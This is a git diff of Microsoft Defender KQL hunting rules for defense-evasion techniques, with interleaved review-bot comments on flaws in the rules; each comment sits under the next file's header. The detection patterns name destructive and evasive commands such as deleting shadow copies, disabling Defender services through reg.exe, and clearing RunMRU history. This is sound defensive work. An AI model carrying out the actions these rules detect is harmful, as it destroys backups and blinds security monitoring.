+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.003
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " del" and ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql b/KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql
index b44d889b..b7c5713f 100644
--- a/KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql
+++ b/KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql
@@ -1,12 +1,12 @@
-// Title: RunMRU Registry Key Deletion - Registry
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-09-25
-// Level: high
-// Description: Detects attempts to delete the RunMRU registry key, which stores the history of commands executed via the run dialog.
-// In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands.
-// Adversaries may delete this key to cover their tracks after executing commands.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070.003
-
-DeviceRegistryEvents
+// Title: RunMRU Registry Key Deletion - Registry
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-09-25
+// Level: high
+// Description: Detects attempts to delete the RunMRU registry key, which stores the history of commands executed via the run dialog.
+// In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands.
+// Adversaries may delete this key to cover their tracks after executing commands.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.003
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/safeboot_registry_key_deleted_via_reg_exe.kql b/KQL/rules/Defense Evasion/safeboot_registry_key_deleted_via_reg_exe.kql
index 194f598a..73990aa8 100644
--- a/KQL/rules/Defense Evasion/safeboot_registry_key_deleted_via_reg_exe.kql
+++ b/KQL/rules/Defense Evasion/safeboot_registry_key_deleted_via_reg_exe.kql
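Review bot: The query carries no ActionType filter, so this high-severity rule fires on every DeviceRegistryEvents row whose key is RunMRU, including the value writes Windows performs each time a user launches something through Win+R, even though the title and description describe a key deletion; the event-type condition of the source rule appears to have been lost in conversion. Add `and ActionType == "RegistryKeyDeleted"` after the key match (and `or ActionType == "RegistryValueDeleted"` if clearing of individual MRU entries is also in scope). As written this is a usage-volume alert, not a deletion detection.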
@@ -1,12 +1,12 @@
-// Title: SafeBoot Registry Key Deleted Via Reg.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems), Tim Shelton
-// Date: 2022-08-08
-// Level: high
-// Description: Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: SafeBoot Registry Key Deleted Via Reg.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), Tim Shelton
+// Date: 2022-08-08
+// Level: high
+// Description: Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " delete " and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot") and (FolderPath endswith "reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/scr_file_write_event.kql b/KQL/rules/Defense Evasion/scr_file_write_event.kql
index b69329c3..24feec24 100644
--- a/KQL/rules/Defense Evasion/scr_file_write_event.kql
+++ b/KQL/rules/Defense Evasion/scr_file_write_event.kql
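Review bot: `FolderPath endswith "reg.exe"` has no path separator, unlike the sibling rule runmru_registry_key_deletion.kql in this same set which anchors on `"\\reg.exe"`; without it the image check also accepts any binary whose name merely ends in reg.exe, which widens the match for no detection benefit. Use `FolderPath endswith "\\reg.exe"` so the two reg.exe rules agree. Matching `" delete "` with surrounding spaces is fine for `reg delete`, but note it misses `reg.exe delete` invoked with tab separators or a quoted key path immediately following the verb only if the space is absent, so this is a style point rather than a gap.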
@@ -1,12 +1,12 @@
-// Title: SCR File Write Event
-// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
-// Date: 2022-04-27
-// Level: medium
-// Description: Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.011
-// False Positives:
-// - The installation of new screen savers by third party software
-
-DeviceFileEvents
+// Title: SCR File Write Event
+// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
+// Date: 2022-04-27
+// Level: medium
+// Description: Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+// False Positives:
+// - The installation of new screen savers by third party software
+
+DeviceFileEvents
 | where FolderPath endswith ".scr" and (not((FolderPath contains ":\\$WINDOWS.~BT\\NewOS\\" or FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\" or FolderPath contains ":\\WUDownloadCache\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/screensaver_registry_key_set.kql b/KQL/rules/Defense Evasion/screensaver_registry_key_set.kql
index 89df8598..5f65fc7f 100644
--- a/KQL/rules/Defense Evasion/screensaver_registry_key_set.kql
+++ b/KQL/rules/Defense Evasion/screensaver_registry_key_set.kql
@@ -1,12 +1,12 @@
-// Title: ScreenSaver Registry Key Set
-// Author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)
-// Date: 2022-05-04
-// Level: medium
-// Description: Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.011
-// False Positives:
-// - Legitimate use of screen saver
-
-DeviceRegistryEvents
+// Title: ScreenSaver Registry Key Set
+// Author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)
+// Date: 2022-05-04
+// Level: medium
+// Description: Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+// False Positives:
+// - Legitimate use of screen saver
+
+DeviceRegistryEvents
 | where InitiatingProcessFolderPath endswith "\\rundll32.exe" and (RegistryValueData endswith ".scr" and RegistryKey contains "\\Control Panel\\Desktop\\SCRNSAVE.EXE") and (not((RegistryValueData contains "C:\\Windows\\System32\\" or RegistryValueData contains "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/scripted_diagnostics_turn_off_check_enabled_registry.kql b/KQL/rules/Defense Evasion/scripted_diagnostics_turn_off_check_enabled_registry.kql
index 28cced97..3ee13923 100644
--- a/KQL/rules/Defense Evasion/scripted_diagnostics_turn_off_check_enabled_registry.kql
+++ b/KQL/rules/Defense Evasion/scripted_diagnostics_turn_off_check_enabled_registry.kql
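Review bot: `RegistryKey contains "\\Control Panel\\Desktop\\SCRNSAVE.EXE"` cannot match in DeviceRegistryEvents: SCRNSAVE.EXE is a value name, and Defender for Endpoint reports the key in RegistryKey and the value name separately in RegistryValueName instead of the combined Sysmon-style TargetObject path that this condition was converted from. Change the middle clause to `RegistryKey endswith "\\Control Panel\\Desktop" and RegistryValueName =~ "SCRNSAVE.EXE" and RegistryValueData endswith ".scr"`. Until then the rule is dead on MDE data despite looking valid.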
@@ -1,12 +1,12 @@
-// Title: Scripted Diagnostics Turn Off Check Enabled - Registry
-// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
-// Date: 2022-06-15
-// Level: medium
-// Description: Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Administrator actions
-
-DeviceRegistryEvents
+// Title: Scripted Diagnostics Turn Off Check Enabled - Registry
+// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
+// Date: 2022-06-15
+// Level: medium
+// Description: Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Administrator actions
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Policies\\Microsoft\\Windows\\ScriptedDiagnostics\\TurnOffCheck"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/scripting_commandline_process_spawned_regsvr32.kql b/KQL/rules/Defense Evasion/scripting_commandline_process_spawned_regsvr32.kql
index e40543bc..00dc8185 100644
--- a/KQL/rules/Defense Evasion/scripting_commandline_process_spawned_regsvr32.kql
+++ b/KQL/rules/Defense Evasion/scripting_commandline_process_spawned_regsvr32.kql
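Review bot: Both halves of this predicate look unmatched against DeviceRegistryEvents. TurnOffCheck is a value under the `...\ScriptedDiagnostics` key, and MDE puts the value name in RegistryValueName rather than appending it to RegistryKey, so `RegistryKey endswith "...\\ScriptedDiagnostics\\TurnOffCheck"` never fires; and the data comparison `"DWORD (0x00000001)"` is Sysmon's rendering, whereas MDE surfaces DWORD data as the plain numeric string with the type in RegistryValueType (worth confirming against live telemetry before merging). Suggested predicate: `| where RegistryKey endswith "\\Policies\\Microsoft\\Windows\\ScriptedDiagnostics" and RegistryValueName =~ "TurnOffCheck" and RegistryValueData == "1"`.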
@@ -1,13 +1,13 @@
-// Title: Scripting/CommandLine Process Spawned Regsvr32
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-26
-// Level: medium
-// Description: Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.010
-// False Positives:
-// - Legitimate ".bat", ".hta", ".ps1" or ".vbs" scripts leverage legitimately often. Apply additional filter and exclusions as necessary
-// - Some legitimate Windows services
-
-DeviceProcessEvents
+// Title: Scripting/CommandLine Process Spawned Regsvr32
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-26
+// Level: medium
+// Description: Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+// False Positives:
+// - Legitimate ".bat", ".hta", ".ps1" or ".vbs" scripts leverage legitimately often. Apply additional filter and exclusions as necessary
+// - Some legitimate Windows services
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\regsvr32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not((ProcessCommandLine endswith " /s C:\\Windows\\System32\\RpcProxy\\RpcProxy.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\cmd.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/sdclt_child_processes.kql b/KQL/rules/Defense Evasion/sdclt_child_processes.kql
index fd5192cf..c4078c64 100644
--- a/KQL/rules/Defense Evasion/sdclt_child_processes.kql
+++ b/KQL/rules/Defense Evasion/sdclt_child_processes.kql
@@ -1,10 +1,10 @@
-// Title: Sdclt Child Processes
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020-05-02
-// Level: medium
-// Description: A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceProcessEvents
+// Title: Sdclt Child Processes
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: medium
+// Description: A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\sdclt.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/sdiagnhost_calling_suspicious_child_process.kql b/KQL/rules/Defense Evasion/sdiagnhost_calling_suspicious_child_process.kql
index b5db0b02..e078f6f0 100644
--- a/KQL/rules/Defense Evasion/sdiagnhost_calling_suspicious_child_process.kql
+++ b/KQL/rules/Defense Evasion/sdiagnhost_calling_suspicious_child_process.kql
@@ -1,10 +1,10 @@
-// Title: Sdiagnhost Calling Suspicious Child Process
-// Author: Nextron Systems, @Kostastsale
-// Date: 2022-06-01
-// Level: high
-// Description: Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036, attack.t1218
-
-DeviceProcessEvents
+// Title: Sdiagnhost Calling Suspicious Child Process
+// Author: Nextron Systems, @Kostastsale
+// Date: 2022-06-01
+// Level: high
+// Description: Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1218
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\taskkill.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\calc.exe") and InitiatingProcessFolderPath endswith "\\sdiagnhost.exe") and (not(((ProcessCommandLine contains "bits" and FolderPath endswith "\\cmd.exe") or ((ProcessCommandLine endswith "-noprofile -" or ProcessCommandLine endswith "-noprofile") and FolderPath endswith "\\powershell.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/security_service_disabled_via_reg_exe.kql b/KQL/rules/Defense Evasion/security_service_disabled_via_reg_exe.kql
index 07766f9a..3bb1cf80 100644
--- a/KQL/rules/Defense Evasion/security_service_disabled_via_reg_exe.kql
+++ b/KQL/rules/Defense Evasion/security_service_disabled_via_reg_exe.kql
@@ -1,12 +1,12 @@
-// Title: Security Service Disabled Via Reg.EXE
-// Author: Florian Roth (Nextron Systems), John Lambert (idea), elhoim
-// Date: 2021-07-14
-// Level: high
-// Description: Detects execution of "reg.exe" to disable security services such as Windows Defender.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Security Service Disabled Via Reg.EXE
+// Author: Florian Roth (Nextron Systems), John Lambert (idea), elhoim
+// Date: 2021-07-14
+// Level: high
+// Description: Detects execution of "reg.exe" to disable security services such as Windows Defender.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "\\AppIDSvc" or ProcessCommandLine contains "\\MsMpSvc" or ProcessCommandLine contains "\\NisSrv" or ProcessCommandLine contains "\\SecurityHealthService" or ProcessCommandLine contains "\\Sense" or ProcessCommandLine contains "\\UsoSvc" or ProcessCommandLine contains "\\WdBoot" or ProcessCommandLine contains "\\WdFilter" or ProcessCommandLine contains "\\WdNisDrv" or ProcessCommandLine contains "\\WdNisSvc" or ProcessCommandLine contains "\\WinDefend" or ProcessCommandLine contains "\\wscsvc" or ProcessCommandLine contains "\\wuauserv") and (ProcessCommandLine contains "d 4" and ProcessCommandLine contains "v Start")) and (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql b/KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql
index 0328c4af..8f0f371a 100644
--- a/KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql
+++ b/KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql
@@ -1,13 +1,13 @@
-// Title: Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-02-05
-// Level: high
-// Description: Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations.
-// This behavior has been observed in-the-wild by different threat actors.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-// False Positives:
-// - Administrators building packages using iexpress.exe
-
-DeviceProcessEvents
+// Title: Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-05
+// Level: high
+// Description: Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations.
+// This behavior has been observed in-the-wild by different threat actors.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Administrators building packages using iexpress.exe
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n " or ProcessCommandLine contains " –n " or ProcessCommandLine contains " —n " or ProcessCommandLine contains " ―n ") and (FolderPath endswith "\\iexpress.exe" or ProcessVersionInfoOriginalFileName =~ "IEXPRESS.exe") and (ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql b/KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql
index 6c230635..15b419c0 100644
--- a/KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql
+++ b/KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql
@@ -1,12 +1,12 @@
-// Title: Self Extraction Directive File Created In Potentially Suspicious Location
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2024-02-05
-// Level: medium
-// Description: Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location.
-// These files are used by the "iexpress.exe" utility in order to create self extracting packages.
-// Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceFileEvents
+// Title: Self Extraction Directive File Created In Potentially Suspicious Location
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-02-05
+// Level: medium
+// Description: Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location.
+// These files are used by the "iexpress.exe" utility in order to create self extracting packages.
+// Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceFileEvents
 | where (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\") and FolderPath endswith ".sed"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/service_registry_key_deleted_via_reg_exe.kql b/KQL/rules/Defense Evasion/service_registry_key_deleted_via_reg_exe.kql
index e401310f..ad613d73 100644
--- a/KQL/rules/Defense Evasion/service_registry_key_deleted_via_reg_exe.kql
+++ b/KQL/rules/Defense Evasion/service_registry_key_deleted_via_reg_exe.kql
@@ -1,12 +1,12 @@
-// Title: Service Registry Key Deleted Via Reg.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-01
-// Level: high
-// Description: Detects execution of "reg.exe" commands with the "delete" flag on services registry key. Often used by attacker to remove AV software services
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Service Registry Key Deleted Via Reg.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-01
+// Level: high
+// Description: Detects execution of "reg.exe" commands with the "delete" flag on services registry key. Often used by attacker to remove AV software services
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " delete " and (FolderPath endswith "reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\services\\"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql b/KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql
index 3e47c582..30a985e6 100644
--- a/KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql
+++ b/KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql
@@ -1,10 +1,10 @@
-// Title: Set Suspicious Files as System Files Using Attrib.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-28
-// Level: high
-// Description: Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1564.001
-
-DeviceProcessEvents
+// Title: Set Suspicious Files as System Files Using Attrib.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-28
+// Level: high
+// Description: Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " +s" and (ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".ps1" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs") and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE") and (ProcessCommandLine contains " %" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\ProgramData\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Windows\\Temp\\")) and (not((ProcessCommandLine contains "\\Windows\\TEMP\\" and ProcessCommandLine contains ".exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/setuid_and_setgid.kql b/KQL/rules/Defense Evasion/setuid_and_setgid.kql
index f7065aab..5cb14d38 100644
--- a/KQL/rules/Defense Evasion/setuid_and_setgid.kql
+++ b/KQL/rules/Defense Evasion/setuid_and_setgid.kql
@@ -1,12 +1,12 @@
-// Title: Setuid and Setgid
-// Author: Ömer Günal
-// Date: 2020-06-16
-// Level: low
-// Description: Detects suspicious change of file privileges with chown and chmod commands
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1548.001
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Setuid and Setgid
+// Author: Ömer Günal
+// Date: 2020-06-16
+// Level: low
+// Description: Detects suspicious change of file privileges with chown and chmod commands
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1548.001
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " chmod u+s" or ProcessCommandLine contains " chmod g+s") and ProcessCommandLine contains "chown root"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/shadow_copies_deletion_using_operating_systems_utilities.kql b/KQL/rules/Defense Evasion/shadow_copies_deletion_using_operating_systems_utilities.kql
index 803df803..cc930614 100644
--- a/KQL/rules/Defense Evasion/shadow_copies_deletion_using_operating_systems_utilities.kql
+++ b/KQL/rules/Defense Evasion/shadow_copies_deletion_using_operating_systems_utilities.kql
@@ -1,13 +1,13 @@
-// Title: Shadow Copies Deletion Using Operating Systems Utilities
-// Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)
-// Date: 2019-10-22
-// Level: high
-// Description: Shadow Copies deletion using operating systems utilities
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.impact, attack.t1070, attack.t1490
-// False Positives:
-// - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason
-// - LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)
-
-DeviceProcessEvents
+// Title: Shadow Copies Deletion Using Operating Systems Utilities
+// Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)
+// Date: 2019-10-22
+// Level: high
+// Description: Shadow Copies deletion using operating systems utilities
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.impact, attack.t1070, attack.t1490
+// False Positives:
+// - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason
+// - LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "shadow" and ProcessCommandLine contains "delete") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\diskshadow.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "wmic.exe", "VSSADMIN.EXE", "diskshadow.exe")))) or ((ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog" and ProcessCommandLine contains "quiet") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")) or (((ProcessCommandLine contains "unbounded" or
ProcessCommandLine contains "/MaxSize=") and (ProcessCommandLine contains "resize" and ProcessCommandLine contains "shadowstorage")) and (FolderPath endswith "\\vssadmin.exe" or ProcessVersionInfoOriginalFileName =~ "VSSADMIN.EXE"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/shell32_dll_execution_in_suspicious_directory.kql b/KQL/rules/Defense Evasion/shell32_dll_execution_in_suspicious_directory.kql
index a39bfd86..a249e1da 100644
--- a/KQL/rules/Defense Evasion/shell32_dll_execution_in_suspicious_directory.kql
+++ b/KQL/rules/Defense Evasion/shell32_dll_execution_in_suspicious_directory.kql
@@ -1,10 +1,10 @@
-// Title: Shell32 DLL Execution in Suspicious Directory
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-11-24
-// Level: high
-// Description: Detects shell32.dll executing a DLL in a suspicious directory
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1218.011
-
-DeviceProcessEvents
+// Title: Shell32 DLL Execution in Suspicious Directory
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-11-24
+// Level: high
+// Description: Detects shell32.dll executing a DLL in a suspicious directory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218.011
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%LocalAppData%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\") and (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/space_after_filename_macos.kql b/KQL/rules/Defense Evasion/space_after_filename_macos.kql
index 7bc2ca3c..6dce835b 100644
--- a/KQL/rules/Defense Evasion/space_after_filename_macos.kql
+++ b/KQL/rules/Defense Evasion/space_after_filename_macos.kql
@@ -1,12 +1,12 @@
-// Title: Space After Filename - macOS
-// Author: remotephone
-// Date: 2021-11-20
-// Level: low
